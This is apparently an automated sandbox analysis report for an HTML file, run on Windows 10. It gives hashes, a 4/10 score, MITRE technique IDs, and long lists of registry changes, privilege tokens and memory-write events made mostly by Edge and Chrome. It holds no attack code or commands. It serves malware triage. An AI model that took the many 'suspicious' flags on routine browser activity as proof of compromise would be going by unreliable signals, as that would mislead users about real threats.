196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005

Resubmissions

26-03-2024 14:26

240326-rrx64sfb7y 10

26-03-2024 14:20

240326-rns3zsca85 4

Analysis

max time kernel
269s
max time network
271s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
26-03-2024 14:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohmygoditsthefunkysh1t.html
Size

3KB
MD5

ace67f099683c4360f442c58da66aeba
SHA1

2b90f1398b79331e8f853ddb004dcc87a1daf540
SHA256

196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
SHA512

02e2465e10ee581b04896dd77ee906542786b7662071befa9b6c07fca00862be063516030045fb29fdec1a68108aaf93cc30db24cd329776b1d316c9d7ca7073

Score

4^/10

Malware Config

Signatures

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3829149121\806280961.pri	PickerHost.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133559365782330133"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{AADA599F-43E7-4283-B962-BDDDDCEA36C6} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "418227836"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4c6d0d04897fda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	PickerHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	PickerHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	PickerHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000003ddb58b30d410f12870b649ae6b7ede6158fe8979175a0ab127e2ffd8e304e2025b5bef5565377e6c9f4def81fd9d3762a7727f702ccbde688a7	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5ae849e9887fda01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f7940ef0887fda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000020000000100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	PickerHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 20eb893abb7fda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 46f140db887fda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings	PickerHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	PickerHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	PickerHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	PickerHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1032	chrome.exe
1032	chrome.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
512	chrome.exe
512	chrome.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1800	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1800	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1800	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3564	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	600	MicrosoftEdge.exe
Token: SeDebugPrivilege	600	MicrosoftEdge.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe
Token: SeShutdownPrivilege	1032	chrome.exe
Token: SeCreatePagefilePrivilege	1032	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe
1032	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
600	MicrosoftEdge.exe
1924	MicrosoftEdgeCP.exe
1800	MicrosoftEdgeCP.exe
1924	MicrosoftEdgeCP.exe
3428	PickerHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 208	1924	MicrosoftEdgeCP.exe	82
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 3564	1924	MicrosoftEdgeCP.exe	79
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
PID 1924 wrote to memory of 4312	1924	MicrosoftEdgeCP.exe	80
